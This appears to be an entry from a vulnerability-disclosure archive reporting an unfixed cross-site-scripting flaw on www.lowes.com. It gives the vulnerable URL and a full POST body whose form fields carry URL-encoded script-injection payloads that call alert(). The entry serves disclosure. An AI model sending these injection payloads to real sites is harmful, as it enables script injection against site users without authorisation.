Security researcher AppleJax, has submitted on 24/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.lowes.com, which at the time of submission ranked 787 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 24/06/2008 |
Date published: 10/06/2009 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: AppleJax |
Domain: www.lowes.com |
Category: XSS |
Pagerank: 787 |
|---|
| URL: https://www.lowes.com/lowes/lkn?action=custSvcOrderIssue&topic=customerService |
| POST: firstName=%22%3E%3Cscript%3Ealert%28%271%27%29%3B%3C%2Fscript%3E&function=postForm&lastName=%22%3E%3 Cscript%3Ealert%28%272%27%29%3B%3C%2Fscript%3E&emailAddress=%22%3E%3Cscript%3Ealert%28%273%27%29%3B% 3C%2Fscript%3E@a.com&areaCode=111&telephoneNumber=1111111&zipCode=2222&orderNumber=%22%3E%3Cscript%3 Ealert%28%274%27%29%3B%3C%2Fscript%3E&customerMessage=%3C%2FTEXTAREA%3E%22%3E%3Cscript%3Ealert%28%27 5%27%29%3B%3C%2Fscript%3E&submit=Send |
|
Click here to view the mirror
|
|
|
| 
